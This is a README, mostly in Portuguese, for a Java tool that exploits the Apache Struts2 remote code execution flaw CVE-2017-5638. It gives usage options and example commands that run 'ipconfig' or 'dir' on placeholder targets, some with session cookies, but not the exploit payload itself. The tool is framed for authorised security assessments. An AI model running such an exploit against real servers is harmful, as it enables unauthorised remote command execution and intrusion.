
Exploit baseado em Java para Apache Struts2 CVE-2017-5638, que executa comandos arbitrários por meio de cabeçalhos HTTP personalizados. Destinado a avaliações de segurança autorizadas.
Isto é uma espécie de portabilidade Java do exploit Python em: https://www.exploit-db.com/exploits/41570/.
Este software foi escrito para não ter dependências externas.
Esta ferramenta é destinada a engenheiros de segurança e profissionais de appsec para avaliações de segurança. Use esta ferramenta com responsabilidade. Não me responsabilizo pela forma como qualquer pessoa usa esta aplicação. NÃO sou responsável por quaisquer danos causados ou crimes cometidos pelo uso desta ferramenta.
Usage:
java -jar struts2_cve-2017-5638.jar [options]
Description:
Exploiting Apache Struts2 Remote Code Execution (CVE-2017-5638).
Options:
-h, --help
Prints this help and exits.
-u, --url [target_URL]
The target URL where the exploit will be performed.
-cmd, --command [command_to_execute]
The command that will be executed on the remote machine.
--cookies [cookies]
Optional. Cookies passed into the request, i.e. authentication cookies.
-v, --verbose
Optional. Increase verbosity.
java -jar struts2_cve-2017-5638.jar --url "https://vuln1.foo.com/asd" --command ipconfig
java -jar struts2_cve-2017-5638.jar --url "https://vuln2.foo.com/asd" --command ipconfig --cookies "JSESSIONID=qwerty0123456789"
java -jar struts2_cve-2017-5638.jar --url "https://vuln3.foo.com/asd" --command dir --cookies "JSESSIONID=qwerty0123456789;foo=bar"
Este projeto é licenciado sob a Licença MIT - consulte o arquivo LICENSE.txt para obter detalhes.